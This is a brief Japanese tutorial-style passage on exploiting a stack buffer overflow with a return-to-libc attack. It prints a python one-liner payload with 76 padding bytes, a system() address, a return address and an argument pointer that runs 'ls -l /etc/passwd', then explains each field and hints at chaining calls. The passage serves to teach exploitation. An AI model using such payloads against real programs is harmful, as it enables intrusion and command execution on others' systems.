さっきの攻撃コード
( '-') python -c 'print "x"*(76) + "\x00\x83\x04\x08" + \ "\x00\x00\x00\x00" + "\xd8\xd4\xff\xff" + "ls -l /etc/passwd" ' > shine
これは
( '-') python -c 'print "x"*(76) + <systemのアドレス> + \ <systemから戻る先> + <systemへの引数> + "ls -l /etc/passwd" ' > shine
system関数から戻る先を、さっきは 0 にしてたけど、
ここをうまく使えば実行を続行させられる